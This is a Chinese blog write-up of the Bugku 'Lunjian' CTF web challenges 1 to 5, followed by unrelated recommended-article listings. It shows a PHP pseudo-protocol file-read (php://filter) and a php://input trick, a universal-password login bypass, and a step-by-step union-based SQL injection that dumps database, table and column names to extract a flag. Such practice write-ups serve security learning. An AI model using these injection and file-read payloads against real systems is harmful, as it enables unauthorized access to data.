论剑场web1、web2、web3、web4、web5

最新推荐文章于 2023-06-05 16:42:05 发布
最新推荐文章于 2023-06-05 16:42:05 发布
阅读量604 收藏
点赞数 1
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45940434/article/details/103567864
版权

web1:

在这里插入图片描述
读图片中代码可知,c=读取b的内容,a与b相等即可得到flag
利用php伪协议,post 1 即可。
http://123.206.31.85:10001/?a=1&b=php://input

web2:

在这里插入图片描述

简单的计算式子,直接正则匹配,算一下就行了。
代码如下:
在这里插入图片描述

web3:

在这里插入图片描述
用burp改文件类型,绕过,得到一个页面
在这里插入图片描述
对op参数,php伪协议,得到flag

http://123.206.31.85:10003/?op=php://filter/read=convert.base64-encode/resource=flag&imagekey=72de19c132dbbb873ec4a9c5b9cd0d974d8ed16d

web4:

在这里插入图片描述
直接万能密码,单引号闭合即可。

web5:

在这里插入图片描述
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0 返回为空
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0 or 1=1 # 返回正常
在这里插入图片描述
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0 union select 1,2 # 回显空
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0 union select 1,2,3 #回显空
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0 union select 1,2,3,4 #回显正常
在这里插入图片描述知道了回显位置,字段数为4,开始爆数据库
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0%20union%20select%201,2,database(),4#
在这里插入图片描述

爆表:
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27web5%27
在这里插入图片描述

爆字段:
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0%20union%20select%201,%20group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27flag%27#

在这里插入图片描述
得到flag:
http://6fe97759aa27a0c9.bugku.com/?mod=read&id=0%20union%20select%201,flag,3,4%20from%20flag#
在这里插入图片描述

圆圈勾勒成指纹
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
论文研究-基于WEB日志的用法模式挖掘 .pdf
08-15
基于WEB日志的用法模式挖掘,张啸剑,,WEB是最浩大的数据库,对数据挖掘有极大的挑战性,其中包含海量的WEB数据。基于WEB数据挖掘主要包括三种类型:WEB内容挖掘,WEB结构挖
论文研究-基于Web的用户访问模式挖掘研究 .pdf
08-17
基于Web的用户访问模式挖掘研究,包剑,,WWW包含了丰富的信息资源,Web挖掘可快速有效地获取所需要的信息。Web访问模式挖掘是通过处理Web使用数据,以发现用户的访问模式,理
CTF_论剑 web1
W3rsn
04-13 181
打开链接之后看到下面的景象 这个考的是变量覆盖漏洞,构造如下URL http://xxxx/?a=&b= 然后就拿到flag了,最后多了一个空格小心不要复制到了
CTF论剑web题目(持续更新)--web1
jiuyongpinyin的博客
07-18 284
WEB1 又是自己不擅长的东西,提前声明,这道题我是蒙出来的,我把变量a=输入上去的时候,不小心碰到了回车,flag就出来了,所以这个道题事后诸葛亮一下。 首先,file_get_contents()这个函数是把一个文件读入到字符串中,我个人理解的就是函数后面的括号里只能跟一个文件的名字或者一个URL,所以这个函数返回的就为空。 其次告诉我们变量a和变量c如果相等,返回flag,那么就应该构造如下pyload: 但是因为变量c是空的,所以其实只需要输入变量a,值为空就可以。 注:本人萌新,不对之处欢迎指
对比web1和web2,我们看到了web3带来的互联网文化变革
weixin_44383880的博客
10-12 528
在收到几个关于 Web3 的问题后,我想写一篇深入研究 Web3 的快速帖子。没有任何长篇大论,我会尽可能简单地解释一下。要了解 Web3,我们先来了解一下 Web1 和 Web2 的特性...
现在大火的Web3是什么 web1 web2
软件工程小施同学 的专栏
01-27 1229
Web 1.0(1994-2004) 中心化的 数据的消费者和生产者是相对独立的 主要是静态的HTML网页,用户之间很少交互。比如新闻网站 Web 2.0(2004年至今) 中心化的 用户即是数据的消费者,又是生产者 可以交互,比如微博 Web3(2008年之后) 去中心化的 在web2.0的基础上引入区块链、加密资产、智能合约和预言机等新技术,以实现可以流通价值的网络 https://learnblockchain.cn/article/3476 ...
Web1、Web2、Web3是什么,它们之间有什么不同
最新发布
qq_68155756的博客
06-05 821
Web3Web1和Web2的主要区别在于,Web1和Web2分别以静态网页和 互动性更高的网页为主,而Web3则致力于建立一个去中心化的网络,使用户能够更好地掌控自己的数据和信息。
论文研究-面向Web的文本信息挖掘技术研究 .pdf
08-14
面向Web的文本信息挖掘技术研究,包剑,,WWW是一个巨大的、分布广泛的、全球性的信息服务中心,它包含了丰富的信息资源。Web挖掘可以快速有效地获取所需要的信息。基于Web
详解:Web应用程序中的字符集攻击 PPT
05-24
Web应用是一个复杂的数据处理体系,这种复杂性经常导致系统种各种安全问题的产生。字符集攻击就是其中一种非常典型的攻击方式。 这种攻击方式在远东国家的系统里非常普遍,已经开始对web应用程序安全产生了严重的...
javascript-empire:202021年ESILV Web应用程序体系结构课程
05-05
我遵循行业最佳做法,每个月有3个路径,每个月有1个专用主题: :chequered_flag: 主题1-Javascript World Domination。 JavaScript如何吞噬世界。 :building_construction: 主题2-Node.js,宇宙大师。 我们如何用...
论剑CTF web-3
m0_46587008的博客
10-25 333
1.web-3 进入环境,发现upload,点开看看 那就开始上传 根据回显推测应该是白名单,# 1.web-3 进入环境,发现upload,点开看看那就开始上传根据回显推测应该是白名单,比较难突破。但是看一眼URL发现有点小惊喜 http://123.206.31.85:10003/?op=upload 这里传进去的参数是op=upload,这个opload应该是一个文件名,推测这里可能是文件包含,在index.php中包含了upload文件才出现的这个上传界面。 2.思路 进入环境,发现u
CTF论剑web题目(持续更新)--WEB5
jiuyongpinyin的博客
07-18 295
web5 首先,题目提示注入,进去之后发现有个id值,猜测这里就是注入点。 进行尝试后发现,这里属于数字型注入并且存在联合查询的注入,所以构造payload: 1.使用order by 语句查询列: 尝试后发现有4列 2.使用联合查询,并暴库: 发现数据库的名称是web5, 3.爆出数据库中的表: payload: mod=read&id=11 union select 1,2,(select group_concat(table_name) from information_schema.tab
web1.0,web2.0与web3.0的区别
热门推荐
无崖子的博客
02-04 13万+
Web1.0:以静态、单向阅读为主,网站内信息可以直接和其他网站信息进行交互,能通过第三方信息平台同时对多家网站信息进行整合使用。 Web2.0:以分享为特征的实时网络,用户在互联网上拥有自己的数据,并能在不同的网站上使用。 Web3.0:将以网络化和个性化为特征,提供更多人工智能服务,完全基于Web,用浏览器即可实现复杂的系统程序才具有的功能。 Web3.0的特征分析: 1、微内容(Widget...
web3的产品架构和web2到底有什么区别?
04-10 798
转载原文链接:http://www.btcwbo.com/5380.html 今天,我看到了一篇伟大的文章,强烈推荐给你。它清楚地解释了web3web2互联网在架构上的区别,这有助于你更好地理解web3的区别。本文将拆解本文。原始链接如下: https:/miror.xyz/owo.eth/orz4h4Q-xbKC-NH8n4mdAyLP2QFD21dsq5ewl05qomk。 下图为传统互联网产品的架构,分为前端、后端和数据库。前端是页面、图片、按钮、输入框等,后端是处理数据并返回到前端的过程,数据存储
Web1到 Web3,互联网经历了什么?
xfilesystem的博客
09-09 603
Web1到 Web2,却也是一种资本中心化的聚集,它和互联网最初的万物互联互通目标已经有着本质上的背离,而 Web3也是基于此而产生的,它正在打破 Web2中的各种弊端,从而发挥互联网的真正潜力。
CTF论剑 web4 web5 web25 web23
veinard_F的博客
06-05 323
web4 打开题目后提示登陆即可看到flag 尝试一下万能密码 得到flag web5
Bugku web3 详细题解
日熙的博客
07-15 3522
题目: Bugku web3: http://123.206.87.240:8002/web3/ 1.链接打开后,显示如下页面: 点击确定又会出现下面的窗口。就这样一直会有对话框弹出,怎么管都关不掉 2.考虑这是浏览器脚本的设置因素,所以要关闭你浏览器里的脚本,在设置采用禁用即可。 但是我这个用的是火狐浏览器,上面有一个“阻止此页面创建更多对话框的” 选项,勾选即可,关闭脚本后网页就是一篇空白,查看网页源码,发现结尾处有一段注释,如下图: 3.发现这是一串Unicode编码,于是放入Unicode在线编
CTF论剑web题目(持续更新)--WEB3
jiuyongpinyin的博客
07-21 360
web3 首先声明,我是参考了大佬的write up ,这里就把自己当时踩的坑说一说吧。 参考链接:https://blog.csdn.net/qq_41995976/article/details/90348633 再次感谢大佬!!! 首先进去让上传一个100x100的png图片,试了好多绕过的方法都不行,最后老老实实的找了一个图片,发现上传成了,之后做了一个图片马,也有了路径,发现不行,检测的机制非常严格,试了各种方法都不行,最后参考大佬的write up,才知道原来考点是php伪协议 payload
newbugku部分writeup
西部壮仔的博客
03-23 3059
进制转换 给出一段数字字符串 1212 1230 1201 1213 1323 1012 1233 1311 1302 1202 1201 1303 1211 301 302 303 1331 仔细观察发现没有超过4的,猜测应该是4进制,然后用python脚本转成10进制,然后取对应ASCII码的字符串 脚本: list = "1212 1230 1201 1213 1323 1012 1233...
web of science下载论文
03-16
Web of Science是一个学术文献检索工具,可以检索到全球范围内的学术期刊、会议论文、专利等文献资源。如果想要下载论文,可以按照以下步骤操作: 1. 打开Web of Science网站,登录账号。 2. 在检索框中输入关键词...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值